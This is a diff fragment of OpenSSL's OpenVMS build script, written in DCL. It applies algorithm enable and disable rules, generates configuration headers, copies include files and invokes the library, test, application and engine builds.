+		     SEED,-
+		     SHA,-
+		     SHA0,-
+		     SHA1,-
+		     SHA256,-
+		     SHA512,-
+		     SOCK,-
+		     SRP,-
+		     SSL2,-
+		     SSL_INTERN,-
+		     SSL_TRACE,-
+		     STACK,-
+		     STATIC_ENGINE,-
+		     STDIO,-
+		     STORE,-
+		     TLSEXT,-
+		     WHIRLPOOL,-
+		     X509
+$! Add a few that we know about
+$ CONFIG_LOGICALS := 'CONFIG_LOGICALS',-
+		     THREADS
+$! The following rules, which dictate how some algorithm choices affect
+$! others, are picked from Configure.
+$! Quick syntax:
+$!  list = item[ ; list]
+$!  item = algos / dependents
+$!  algos = algo [, algos]
+$!  dependents = dependent [, dependents]
+$! When a list of algos is specified in one item, it means that they must
+$! all be disabled for the rule to apply.
+$! When a list of dependents is specified in one item, it means that they
+$! will all be disabled if the rule applies.
+$! Rules are checked sequentially.  If a rule disables an algorithm, it will
+$! affect all following rules that depend on that algorithm being disabled.
+$! To force something to be enabled or disabled, have no algorithms in the
+$! algos part.
+$ CONFIG_DISABLE_RULES := RIJNDAEL/AES;-
+			  DES/MDC2;-
+			  EC/ECDSA,ECDH;-
+			  MD5/SSL2,SSL3,TLS1;-
+			  SHA/SSL3,TLS1;-
+			  RSA/SSL2;-
+			  RSA,DSA/SSL2;-
+			  DH/SSL3,TLS1;-
+			  TLS1/TLSEXT;-
+			  EC/GOST;-
+			  DSA/GOST;-
+			  DH/GOST;-
+			  /STATIC_ENGINE;-
+			  /KRB5;-
+			  /EC_NISTP_64_GCC_128;-
+			  /GMP;-
+			  /MD2;-
+			  /RC5;-
+			  /RFC3779;-
+			  /SCTP;-
+			  /SSL_TRACE
+$ CONFIG_ENABLE_RULES := ZLIB_DYNAMIC/ZLIB;-
+			 /THREADS
+$
+$! Architecture specific rule addtions
+$ IF ARCH .EQS. "VAX"
+$ THEN
+$   ! Disable algorithms that require 64-bit integers in C
+$   CONFIG_DISABLE_RULES = CONFIG_DISABLE_RULES + -
+			   ";/GOST" + -
+			   ";/WHIRLPOOL"
+$ ENDIF
+$
+$ CONFIG_LOG_I = 0
+$ CONFIG_LOG_LOOP1:
+$   CONFIG_LOG_E = F$EDIT(F$ELEMENT(CONFIG_LOG_I,",",CONFIG_LOGICALS),"TRIM")
+$   CONFIG_LOG_I = CONFIG_LOG_I + 1
+$   IF CONFIG_LOG_E .EQS. "" THEN GOTO CONFIG_LOG_LOOP1
+$   IF CONFIG_LOG_E .EQS. "," THEN GOTO CONFIG_LOG_LOOP1_END
+$   IF F$TRNLNM("OPENSSL_NO_"+CONFIG_LOG_E)
+$   THEN
+$       CONFIG_DISABLED_'CONFIG_LOG_E' := YES
+$       CONFIG_ENABLED_'CONFIG_LOG_E' := NO
+$	CONFIG_CHANGED_'CONFIG_LOG_E' := YES
+$   ELSE
+$       CONFIG_DISABLED_'CONFIG_LOG_E' := NO
+$       CONFIG_ENABLED_'CONFIG_LOG_E' := YES
+$	! Because all algorithms are assumed enabled by default
+$	CONFIG_CHANGED_'CONFIG_LOG_E' := NO
+$   ENDIF
+$   GOTO CONFIG_LOG_LOOP1
+$ CONFIG_LOG_LOOP1_END:
+$
+$! Apply cascading disable rules
+$ CONFIG_DISABLE_I = 0
+$ CONFIG_DISABLE_LOOP0:
+$   CONFIG_DISABLE_E = F$EDIT(F$ELEMENT(CONFIG_DISABLE_I,";", -
+     CONFIG_DISABLE_RULES),"TRIM")
+$   CONFIG_DISABLE_I = CONFIG_DISABLE_I + 1
+$   IF CONFIG_DISABLE_E .EQS. "" THEN GOTO CONFIG_DISABLE_LOOP0
+$   IF CONFIG_DISABLE_E .EQS. ";" THEN GOTO CONFIG_DISABLE_LOOP0_END
+$
+$   CONFIG_DISABLE_ALGOS = F$EDIT(F$ELEMENT(0,"/",CONFIG_DISABLE_E),"TRIM")
+$   CONFIG_DISABLE_DEPENDENTS = F$EDIT(F$ELEMENT(1,"/",CONFIG_DISABLE_E),"TRIM")
+$   TO_DISABLE := YES
+$   CONFIG_ALGO_I = 0
+$   CONFIG_DISABLE_LOOP1:
+$     CONFIG_ALGO_E = F$EDIT(F$ELEMENT(CONFIG_ALGO_I,",", -
+       CONFIG_DISABLE_ALGOS),"TRIM")
+$     CONFIG_ALGO_I = CONFIG_ALGO_I + 1
+$     IF CONFIG_ALGO_E .EQS. "" THEN GOTO CONFIG_DISABLE_LOOP1
+$     IF CONFIG_ALGO_E .EQS. "," THEN GOTO CONFIG_DISABLE_LOOP1_END
+$     IF F$TYPE(CONFIG_DISABLED_'CONFIG_ALGO_E') .EQS. ""
+$     THEN
+$	TO_DISABLE := NO
+$     ELSE
+$	IF .NOT. CONFIG_DISABLED_'CONFIG_ALGO_E' THEN TO_DISABLE := NO
+$     ENDIF
+$     GOTO CONFIG_DISABLE_LOOP1
+$   CONFIG_DISABLE_LOOP1_END:
+$
+$   IF TO_DISABLE
+$   THEN
+$     CONFIG_DEPENDENT_I = 0
+$     CONFIG_DISABLE_LOOP2:
+$	CONFIG_DEPENDENT_E = F$EDIT(F$ELEMENT(CONFIG_DEPENDENT_I,",", -
+         CONFIG_DISABLE_DEPENDENTS),"TRIM")
+$	CONFIG_DEPENDENT_I = CONFIG_DEPENDENT_I + 1
+$	IF CONFIG_DEPENDENT_E .EQS. "" THEN GOTO CONFIG_DISABLE_LOOP2
+$	IF CONFIG_DEPENDENT_E .EQS. "," THEN GOTO CONFIG_DISABLE_LOOP2_END
+$       CONFIG_DISABLED_'CONFIG_DEPENDENT_E' := YES
+$       CONFIG_ENABLED_'CONFIG_DEPENDENT_E' := NO
+$	! Better not to assume defaults at this point...
+$	CONFIG_CHANGED_'CONFIG_DEPENDENT_E' := YES
+$	WRITE SYS$ERROR -
+         "''CONFIG_DEPENDENT_E' disabled by rule ''CONFIG_DISABLE_E'"
+$	GOTO CONFIG_DISABLE_LOOP2
+$     CONFIG_DISABLE_LOOP2_END:
+$   ENDIF
+$   GOTO CONFIG_DISABLE_LOOP0
+$ CONFIG_DISABLE_LOOP0_END:
+$	
+$! Apply cascading enable rules
+$ CONFIG_ENABLE_I = 0
+$ CONFIG_ENABLE_LOOP0:
+$   CONFIG_ENABLE_E = F$EDIT(F$ELEMENT(CONFIG_ENABLE_I,";", -
+     CONFIG_ENABLE_RULES),"TRIM")
+$   CONFIG_ENABLE_I = CONFIG_ENABLE_I + 1
+$   IF CONFIG_ENABLE_E .EQS. "" THEN GOTO CONFIG_ENABLE_LOOP0
+$   IF CONFIG_ENABLE_E .EQS. ";" THEN GOTO CONFIG_ENABLE_LOOP0_END
+$
+$   CONFIG_ENABLE_ALGOS = F$EDIT(F$ELEMENT(0,"/",CONFIG_ENABLE_E),"TRIM")
+$   CONFIG_ENABLE_DEPENDENTS = F$EDIT(F$ELEMENT(1,"/",CONFIG_ENABLE_E),"TRIM")
+$   TO_ENABLE := YES
+$   CONFIG_ALGO_I = 0
+$   CONFIG_ENABLE_LOOP1:
+$     CONFIG_ALGO_E = F$EDIT(F$ELEMENT(CONFIG_ALGO_I,",", -
+       CONFIG_ENABLE_ALGOS),"TRIM")
+$     CONFIG_ALGO_I = CONFIG_ALGO_I + 1
+$     IF CONFIG_ALGO_E .EQS. "" THEN GOTO CONFIG_ENABLE_LOOP1
+$     IF CONFIG_ALGO_E .EQS. "," THEN GOTO CONFIG_ENABLE_LOOP1_END
+$     IF F$TYPE(CONFIG_ENABLED_'CONFIG_ALGO_E') .EQS. ""
+$     THEN
+$	TO_ENABLE := NO
+$     ELSE
+$	IF .NOT. CONFIG_ENABLED_'CONFIG_ALGO_E' THEN TO_ENABLE := NO
+$     ENDIF
+$     GOTO CONFIG_ENABLE_LOOP1
+$   CONFIG_ENABLE_LOOP1_END:
+$
+$   IF TO_ENABLE
+$   THEN
+$     CONFIG_DEPENDENT_I = 0
+$     CONFIG_ENABLE_LOOP2:
+$	CONFIG_DEPENDENT_E = F$EDIT(F$ELEMENT(CONFIG_DEPENDENT_I,",", -
+         CONFIG_ENABLE_DEPENDENTS),"TRIM")
+$	CONFIG_DEPENDENT_I = CONFIG_DEPENDENT_I + 1
+$	IF CONFIG_DEPENDENT_E .EQS. "" THEN GOTO CONFIG_ENABLE_LOOP2
+$	IF CONFIG_DEPENDENT_E .EQS. "," THEN GOTO CONFIG_ENABLE_LOOP2_END
+$       CONFIG_DISABLED_'CONFIG_DEPENDENT_E' := NO
+$       CONFIG_ENABLED_'CONFIG_DEPENDENT_E' := YES
+$	! Better not to assume defaults at this point...
+$	CONFIG_CHANGED_'CONFIG_DEPENDENT_E' := YES
+$	WRITE SYS$ERROR -
+         "''CONFIG_DEPENDENT_E' enabled by rule ''CONFIG_ENABLE_E'"
+$	GOTO CONFIG_ENABLE_LOOP2
+$     CONFIG_ENABLE_LOOP2_END:
+$   ENDIF
+$   GOTO CONFIG_ENABLE_LOOP0
+$ CONFIG_ENABLE_LOOP0_END:
+$
+$! Write to the configuration
+$ CONFIG_LOG_I = 0
+$ CONFIG_LOG_LOOP2:
+$   CONFIG_LOG_E = F$EDIT(F$ELEMENT(CONFIG_LOG_I,",",CONFIG_LOGICALS),"TRIM")
+$   CONFIG_LOG_I = CONFIG_LOG_I + 1
+$   IF CONFIG_LOG_E .EQS. "" THEN GOTO CONFIG_LOG_LOOP2
+$   IF CONFIG_LOG_E .EQS. "," THEN GOTO CONFIG_LOG_LOOP2_END
+$   IF CONFIG_CHANGED_'CONFIG_LOG_E'
+$   THEN
+$     IF CONFIG_DISABLED_'CONFIG_LOG_E'
+$     THEN
+$	WRITE H_FILE "#ifndef OPENSSL_NO_",CONFIG_LOG_E
+$	WRITE H_FILE "# define OPENSSL_NO_",CONFIG_LOG_E
+$	WRITE H_FILE "#endif"
+$     ELSE
+$	WRITE H_FILE "#ifndef OPENSSL_",CONFIG_LOG_E
+$	WRITE H_FILE "# define OPENSSL_",CONFIG_LOG_E
+$	WRITE H_FILE "#endif"
+$     ENDIF
+$   ENDIF
+$   GOTO CONFIG_LOG_LOOP2
+$ CONFIG_LOG_LOOP2_END:
+$!
+$ WRITE H_FILE ""
+$ WRITE H_FILE "/* 2011-02-23 SMS."
+$ WRITE H_FILE " * On VMS (V8.3), setvbuf() doesn't support a 64-bit"
+$ WRITE H_FILE " * ""in"" pointer, and the help says:"
+$ WRITE H_FILE " *       Please note that the previously documented"
+$ WRITE H_FILE " *       value _IONBF is not supported."
+$ WRITE H_FILE " * So, skip it on VMS."
+$ WRITE H_FILE " */"
+$ WRITE H_FILE "#define OPENSSL_NO_SETVBUF_IONBF"
+$ WRITE H_FILE "/* STCP support comes with TCPIP 5.7 ECO 2 "
+$ WRITE H_FILE " * enable on newer systems / 2012-02-24 arpadffy */"
+$ WRITE H_FILE "#define OPENSSL_NO_SCTP"
+$ WRITE H_FILE "#define OPENSSL_NO_LIBUNBOUND"
+$ WRITE H_FILE ""
+$!
+$! Add in the common "crypto/opensslconf.h.in".
+$!
+$ TYPE 'OPENSSLCONF_H_IN' /OUTPUT=H_FILE:
+$!
+$ IF ARCH .NES. "VAX"
+$ THEN
+$!
+$!  Write the non-VAX specific data
+$!
+$   WRITE H_FILE "#if defined(HEADER_RC4_H)"
+$   WRITE H_FILE "#undef RC4_INT"
+$   WRITE H_FILE "#define RC4_INT unsigned int"
+$   WRITE H_FILE "#undef RC4_CHUNK"
+$   WRITE H_FILE "#define RC4_CHUNK unsigned long long"
+$   WRITE H_FILE "#endif"
+$!
+$   WRITE H_FILE "#if defined(HEADER_DES_LOCL_H)"
+$   WRITE H_FILE "#undef DES_LONG"
+$   WRITE H_FILE "#define DES_LONG unsigned int"
+$   WRITE H_FILE "#undef DES_PTR"
+$   WRITE H_FILE "#define DES_PTR"
+$   WRITE H_FILE "#undef DES_RISC1"
+$   WRITE H_FILE "#undef DES_RISC2"
+$   WRITE H_FILE "#define DES_RISC1"
+$   WRITE H_FILE "#undef DES_UNROLL"
+$   WRITE H_FILE "#define DES_UNROLL"
+$   WRITE H_FILE "#endif"
+$!
+$   WRITE H_FILE "#if defined(HEADER_BN_H)"
+$   WRITE H_FILE "#undef BN_LLONG"	! Never define with SIXTY_FOUR_BIT
+$   WRITE H_FILE "#undef SIXTY_FOUR_BIT_LONG"
+$   WRITE H_FILE "#undef SIXTY_FOUR_BIT"
+$   WRITE H_FILE "#define SIXTY_FOUR_BIT"
+$   WRITE H_FILE "#undef THIRTY_TWO_BIT"
+$   WRITE H_FILE "#undef SIXTEEN_BIT"
+$   WRITE H_FILE "#undef EIGHT_BIT"
+$   WRITE H_FILE "#endif"
+$
+$   WRITE H_FILE "#undef OPENSSL_EXPORT_VAR_AS_FUNCTION"
+$!
+$!  Else...
+$!
+$ ELSE
+$!
+$!  Write the VAX specific data
+$!
+$   WRITE H_FILE "#if defined(HEADER_RC4_H)"
+$   WRITE H_FILE "#undef RC4_INT"
+$   WRITE H_FILE "#define RC4_INT unsigned char"
+$   WRITE H_FILE "#undef RC4_CHUNK"
+$   WRITE H_FILE "#define RC4_CHUNK unsigned long"
+$   WRITE H_FILE "#endif"
+$!
+$   WRITE H_FILE "#if defined(HEADER_DES_LOCL_H)"
+$   WRITE H_FILE "#undef DES_LONG"
+$   WRITE H_FILE "#define DES_LONG unsigned long"
+$   WRITE H_FILE "#undef DES_PTR"
+$   WRITE H_FILE "#define DES_PTR"
+$   WRITE H_FILE "#undef DES_RISC1"
+$   WRITE H_FILE "#undef DES_RISC2"
+$   WRITE H_FILE "#undef DES_UNROLL"
+$   WRITE H_FILE "#endif"
+$!
+$   WRITE H_FILE "#if defined(HEADER_BN_H)"
+$   WRITE H_FILE "#undef BN_LLONG"	! VAX C/DEC C doesn't have long long
+$   WRITE H_FILE "#undef SIXTY_FOUR_BIT_LONG"
+$   WRITE H_FILE "#undef SIXTY_FOUR_BIT"
+$   WRITE H_FILE "#undef THIRTY_TWO_BIT"
+$   WRITE H_FILE "#define THIRTY_TWO_BIT"
+$   WRITE H_FILE "#undef SIXTEEN_BIT"
+$   WRITE H_FILE "#undef EIGHT_BIT"
+$   WRITE H_FILE "#endif"
+$!
+$! Oddly enough, the following symbol is tested in crypto/sha/sha512.c
+$! before sha.h gets included (and HEADER_SHA_H defined), so we will not
+$! protect this one...
+$   WRITE H_FILE "#undef OPENSSL_NO_SHA512"
+$   WRITE H_FILE "#define OPENSSL_NO_SHA512"
+$!
+$   WRITE H_FILE "#undef OPENSSL_EXPORT_VAR_AS_FUNCTION"
+$   WRITE H_FILE "#define OPENSSL_EXPORT_VAR_AS_FUNCTION"
+$!
+$!  End
+$!
+$ ENDIF
+$!
+$! Close the [.CRYPTO._xxx]OPENSSLCONF.H file
+$!
+$ CLOSE H_FILE
+$!
+$! Purge The [.CRYPTO._xxx]OPENSSLCONF.H file
+$!
+$ PURGE SYS$DISK:[.CRYPTO.'ARCHD']OPENSSLCONF.H
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Rebuild The "[.CRYPTO._xxx]BUILDINF.H" file.
+$!
+$ BUILDINF:
+$!
+$! Tell The User We Are Creating The [.CRYPTO._xxx]BUILDINF.H File.
+$!
+$ WRITE SYS$OUTPUT "Creating [.CRYPTO.''ARCHD']BUILDINF.H Include File."
+$!
+$! Create The [.CRYPTO._xxx]BUILDINF.H File.
+$!
+$ BIH_NAME = "SYS$DISK:[.CRYPTO.''ARCHD']BUILDINF.H"
+$ CREATE /FDL=SYS$INPUT: 'BIH_NAME'
+RECORD
+        FORMAT stream_lf
+$!
+$ OPEN /APPEND H_FILE 'bih_name'
+$!
+$! Get The Current Date & Time.
+$!
+$ TIME = F$TIME()
+$!
+$! Write The [.CRYPTO._xxx]BUILDINF.H File.
+$!
+$ CFLAGS = ""
+$ if (POINTER_SIZE .nes. "")
+$ then
+$   CFLAGS = CFLAGS+ "/POINTER_SIZE=''POINTER_SIZE'"
+$ endif
+$ if (ZLIB .nes. "")
+$ then
+$   if (CFLAGS .nes. "") then CFLAGS = CFLAGS+ " "
+$   CFLAGS = CFLAGS+ "/DEFINE=ZLIB"
+$ endif
+$! 
+$ WRITE H_FILE "#define CFLAGS cflags"
+$ WRITE H_FILE "static const char cflags[] = ""compiler: ''CFLAGS'"";"
+$ WRITE H_FILE "#define PLATFORM ""platform: VMS ''ARCHD' ''VMS_VERSION'"""
+$ WRITE H_FILE "#define DATE ""built on: ''TIME'"" "
+$!
+$! Close The [.CRYPTO._xxx]BUILDINF.H File.
+$!
+$ CLOSE H_FILE
+$!
+$! Purge The [.CRYPTO._xxx]BUILDINF.H File.
+$!
+$ PURGE SYS$DISK:[.CRYPTO.'ARCHD']BUILDINF.H
+$!
+$! Delete [.CRYPTO]BUILDINF.H File, as there might be some residue from Unix.
+$!
+$ IF F$SEARCH("[.CRYPTO]BUILDINF.H") .NES. "" THEN -
+     DELETE SYS$DISK:[.CRYPTO]BUILDINF.H;*
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Copy a lot of files around.
+$!
+$ SOFTLINKS: 
+$!
+$!!!! Tell The User We Are Partly Rebuilding The [.APPS] Directory.
+$!!!!
+$!!! WRITE SYS$OUTPUT "Rebuilding The '[.APPS]MD4.C' File."
+$!!!!
+$!!! DELETE SYS$DISK:[.APPS]MD4.C;*
+$!!!!
+$!!!! Copy MD4.C from [.CRYPTO.MD4] into [.APPS]
+$!!!!
+$!!! COPY SYS$DISK:[.CRYPTO.MD4]MD4.C SYS$DISK:[.APPS]
+$!
+$! Ensure that the [.include.openssl] directory contains a full set of
+$! real header files.  The distribution kit may have left real or fake
+$! symlinks there.  Rather than think about what's there, simply delete
+$! the destination files (fake or real symlinks) before copying the real
+$! header files in.  (Copying a real header file onto a real symlink
+$! merely duplicates the real header file at its source.)
+$!
+$! Tell The User We Are Rebuilding The [.include.openssl] Directory.
+$!
+$ WRITE SYS$OUTPUT "Rebuilding The '[.include.openssl]' Directory."
+$!
+$! First, make sure the directory exists.  If it did exist, delete all
+$! the existing header files (or fake or real symlinks).
+$!
+$ if f$parse( "sys$disk:[.include.openssl]") .eqs. ""
+$ then
+$   create /directory sys$disk:[.include.openssl]
+$ else
+$   delete sys$disk:[.include.openssl]*.h;*
+$ endif
+$!
+$! Copy All The ".H" Files From The Main Directory.
+$!
+$ EXHEADER := e_os2.h
+$ copy 'exheader' sys$disk:[.include.openssl]
+$!
+$! Copy All The ".H" Files From The [.CRYPTO] Directory Tree.
+$!
+$ SDIRS := , -
+   'ARCHD', -
+   OBJECTS, -
+   MD4, MD5, SHA, MDC2, HMAC, RIPEMD, WHRLPOOL, -
+   DES, AES, RC2, RC4, IDEA, BF, CAST, CAMELLIA, SEED, MODES, -
+   BN, EC, RSA, DSA, ECDSA, DH, ECDH, DSO, ENGINE, -
+   BUFFER, BIO, STACK, LHASH, RAND, ERR, -
+   EVP, ASN1, PEM, X509, X509V3, CONF, TXT_DB, PKCS7, PKCS12, -
+   COMP, OCSP, UI, KRB5, -
+   CMS, PQUEUE, TS, JPAKE, SRP, STORE, CMAC
+$!
+$ EXHEADER_ := crypto.h, opensslv.h, ebcdic.h, symhacks.h, ossl_typ.h
+$ EXHEADER_'ARCHD' := opensslconf.h
+$ EXHEADER_OBJECTS := objects.h, obj_mac.h
+$ EXHEADER_MD2 := md2.h
+$ EXHEADER_MD4 := md4.h
+$ EXHEADER_MD5 := md5.h
+$ EXHEADER_SHA := sha.h
+$ EXHEADER_MDC2 := mdc2.h
+$ EXHEADER_HMAC := hmac.h
+$ EXHEADER_RIPEMD := ripemd.h
+$ EXHEADER_WHRLPOOL := whrlpool.h
+$ EXHEADER_DES := des.h, des_old.h
+$ EXHEADER_AES := aes.h
+$ EXHEADER_RC2 := rc2.h
+$ EXHEADER_RC4 := rc4.h
+$ EXHEADER_RC5 := rc5.h
+$ EXHEADER_IDEA := idea.h
+$ EXHEADER_BF := blowfish.h
+$ EXHEADER_CAST := cast.h
+$ EXHEADER_CAMELLIA := camellia.h
+$ EXHEADER_SEED := seed.h
+$ EXHEADER_MODES := modes.h
+$ EXHEADER_BN := bn.h
+$ EXHEADER_EC := ec.h
+$ EXHEADER_RSA := rsa.h
+$ EXHEADER_DSA := dsa.h
+$ EXHEADER_ECDSA := ecdsa.h
+$ EXHEADER_DH := dh.h
+$ EXHEADER_ECDH := ecdh.h
+$ EXHEADER_DSO := dso.h
+$ EXHEADER_ENGINE := engine.h
+$ EXHEADER_BUFFER := buffer.h
+$ EXHEADER_BIO := bio.h
+$ EXHEADER_STACK := stack.h, safestack.h
+$ EXHEADER_LHASH := lhash.h
+$ EXHEADER_RAND := rand.h
+$ EXHEADER_ERR := err.h
+$ EXHEADER_EVP := evp.h
+$ EXHEADER_ASN1 := asn1.h, asn1_mac.h, asn1t.h
+$ EXHEADER_PEM := pem.h, pem2.h
+$ EXHEADER_X509 := x509.h, x509_vfy.h
+$ EXHEADER_X509V3 := x509v3.h
+$ EXHEADER_CONF := conf.h, conf_api.h
+$ EXHEADER_TXT_DB := txt_db.h
+$ EXHEADER_PKCS7 := pkcs7.h
+$ EXHEADER_PKCS12 := pkcs12.h
+$ EXHEADER_COMP := comp.h
+$ EXHEADER_OCSP := ocsp.h
+$ EXHEADER_UI := ui.h, ui_compat.h
+$ EXHEADER_KRB5 := krb5_asn.h
+$ EXHEADER_CMS := cms.h
+$ EXHEADER_PQUEUE := pqueue.h
+$ EXHEADER_TS := ts.h
+$ EXHEADER_JPAKE := jpake.h
+$ EXHEADER_SRP := srp.h
+$!!! EXHEADER_STORE := store.h, str_compat.h
+$ EXHEADER_STORE := store.h
+$ EXHEADER_CMAC := cmac.h
+$!
+$ i = 0
+$ loop_sdirs:
+$   sdir = f$edit( f$element( i, ",", sdirs), "trim")
+$   i = i + 1
+$   if (sdir .eqs. ",") then goto loop_sdirs_end
+$   hdr_list = exheader_'sdir'
+$   if (sdir .nes. "") then sdir = "."+ sdir
+$   copy [.crypto'sdir']'hdr_list' sys$disk:[.include.openssl]
+$ goto loop_sdirs
+$ loop_sdirs_end:
+$!
+$! Copy All The ".H" Files From The [.SSL] Directory.
+$!
+$! (keep these in the same order as ssl/Makefile)
+$ EXHEADER := ssl.h, ssl2.h, ssl3.h, ssl23.h, tls1.h, dtls1.h, kssl.h, srtp.h
+$ copy sys$disk:[.ssl]'exheader' sys$disk:[.include.openssl]
+$!
+$! Purge the [.include.openssl] header files.
+$!
+$ purge sys$disk:[.include.openssl]*.h
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Build The "[.xxx.EXE.CRYPTO]SSL_LIBCRYPTO''LIB32'.OLB" Library.
+$!
+$ CRYPTO:
+$!
+$! Tell The User What We Are Doing.
+$!
+$ WRITE SYS$OUTPUT ""
+$ WRITE SYS$OUTPUT -
+   "Building The [.",ARCHD,".EXE.CRYPTO]SSL_LIBCRYPTO''LIB32'.OLB Library."
+$!
+$! Go To The [.CRYPTO] Directory.
+$!
+$ SET DEFAULT SYS$DISK:[.CRYPTO]
+$!
+$! Build The [.xxx.EXE.CRYPTO]LIBCRYPTO.OLB Library.
+$!  
+$ @CRYPTO-LIB LIBRARY 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" -
+   "''ISSEVEN'" "''BUILDPART'" "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Build The [.xxx.EXE.CRYPTO]*.EXE Test Applications.
+$!
+$!!! DISABLED, as these test programs lack any support
+$!!!$ @CRYPTO-LIB APPS 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" -
+$!!!   "''ISSEVEN'" "''BUILDPART'" "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Go Back To The Main Directory.
+$!
+$ SET DEFAULT [-]
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$!
+$! Build The "[.xxx.EXE.SSL]SSL_LIBSSL''LIB32'.OLB" Library.
+$!
+$ SSL:
+$!
+$! Tell The User What We Are Doing.
+$!
+$ WRITE SYS$OUTPUT ""
+$ WRITE SYS$OUTPUT -
+   "Building The [.",ARCHD,".EXE.SSL]SSL_LIBSSL''LIB32'.OLB Library."
+$!
+$! Go To The [.SSL] Directory.
+$!
+$ SET DEFAULT SYS$DISK:[.SSL]
+$!
+$! Build The [.xxx.EXE.SSL]LIBSSL.OLB Library.
+$!
+$ @SSL-LIB LIBRARY 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" -
+   "''ISSEVEN'" "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Go Back To The Main Directory.
+$!
+$ SET DEFAULT [-]
+$!
+$! Time To Return.
+$!
+$ RETURN
+$!
+$! Build The "[.xxx.EXE.SSL]SSL_TASK.EXE" Program.
+$!
+$ SSL_TASK:
+$!
+$! Tell The User What We Are Doing.
+$!
+$ WRITE SYS$OUTPUT ""
+$ WRITE SYS$OUTPUT -
+   "Building DECNet Based SSL Engine, [.",ARCHD,".EXE.SSL]SSL_TASK.EXE"
+$!
+$! Go To The [.SSL] Directory.
+$!
+$ SET DEFAULT SYS$DISK:[.SSL]
+$!
+$! Build The [.xxx.EXE.SSL]SSL_TASK.EXE
+$!
+$ @SSL-LIB SSL_TASK 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" -
+   "''ISSEVEN'" "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Go Back To The Main Directory.
+$!
+$ SET DEFAULT [-]
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Build The OpenSSL Test Programs.
+$!
+$ TEST:
+$!
+$! Tell The User What We Are Doing.
+$!
+$ WRITE SYS$OUTPUT ""
+$ WRITE SYS$OUTPUT "Building The OpenSSL [.",ARCHD,".EXE.TEST] Test Utilities."
+$!
+$! Go To The [.TEST] Directory.
+$!
+$ SET DEFAULT SYS$DISK:[.TEST]
+$!
+$! Build The Test Programs.
+$!
+$ @MAKETESTS 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" "''ISSEVEN'" -
+   "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Go Back To The Main Directory.
+$!
+$ SET DEFAULT [-]
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Build The OpenSSL Application Programs.
+$!
+$ APPS:
+$!
+$! Tell The User What We Are Doing.
+$!
+$ WRITE SYS$OUTPUT ""
+$ WRITE SYS$OUTPUT "Building OpenSSL [.",ARCHD,".EXE.APPS] Applications."
+$!
+$! Go To The [.APPS] Directory.
+$!
+$ SET DEFAULT SYS$DISK:[.APPS]
+$!
+$! Build The Application Programs.
+$!
+$ @MAKEAPPS 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" "''ISSEVEN'" -
+   "" "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Go Back To The Main Directory.
+$!
+$ SET DEFAULT [-]
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Build The OpenSSL Application Programs.
+$!
+$ ENGINES:
+$!
+$! Tell The User What We Are Doing.
+$!
+$ WRITE SYS$OUTPUT ""
+$ WRITE SYS$OUTPUT "Building OpenSSL [.",ARCHD,".EXE.ENGINES] Engines."
+$!
+$! Go To The [.ENGINES] Directory.
+$!
+$ SET DEFAULT SYS$DISK:[.ENGINES]
+$!
+$! Build The Application Programs.
+$!
+$ @MAKEENGINES ENGINES 'DEBUGGER' "''COMPILER'" "''TCPIP_TYPE'" -
+   "''ISSEVEN'" "''BUILDPART'" "''POINTER_SIZE'" "''ZLIB'"
+$!
+$! Go Back To The Main Directory.
+$!
+$ SET DEFAULT [-]
+$!
+$! That's All, Time To RETURN.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Check if there's a "part", and separate it out
+$!
+$ BUILDPART = F$ELEMENT(1,"/",P1)
+$ IF BUILDPART .EQS. "/"
+$ THEN
+$   BUILDPART = ""
+$ ELSE
+$   P1 = F$EXTRACT(0,F$LENGTH(P1) - F$LENGTH(BUILDPART) - 1, P1)
+$ ENDIF
+$!
+$! Check To See If P1 Is Blank.
+$!
+$ IF (P1.EQS."ALL")
+$ THEN
+$!
+$!   P1 Is ALL, So Build Everything.
+$!
+$    BUILDCOMMAND = "ALL"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Else, Check To See If P1 Has A Valid Argument.
+$!
+$   IF (P1.EQS."CONFIG").OR.(P1.EQS."BUILDINF").OR.(P1.EQS."SOFTLINKS") -
+       .OR.(P1.EQS."BUILDALL") -
+       .OR.(P1.EQS."CRYPTO").OR.(P1.EQS."SSL") -
+       .OR.(P1.EQS."SSL_TASK").OR.(P1.EQS."TEST").OR.(P1.EQS."APPS") -
+       .OR.(P1.EQS."ENGINES")
+$   THEN
+$!
+$!    A Valid Argument.
+$!
+$     BUILDCOMMAND = P1
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "USAGE:   @MAKEVMS.COM [Target] [Pointer size] [Debug option] <Compiler> <TCP/IP library>"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "Example: @MAKEVMS.COM ALL """" NODEBUG DECC TCPIP"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Target ",P1," Is Invalid.  The Valid Target Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALL      :  Just Build Everything."
+$     WRITE SYS$OUTPUT "    CONFIG   :  Just build the [.CRYPTO._xxx]OPENSSLCONF.H file."
+$     WRITE SYS$OUTPUT "    BUILDINF :  Just build the [.CRYPTO._xxx]BUILDINF.H file."
+$     WRITE SYS$OUTPUT "    SOFTLINKS:  Just Fix The Unix soft links."
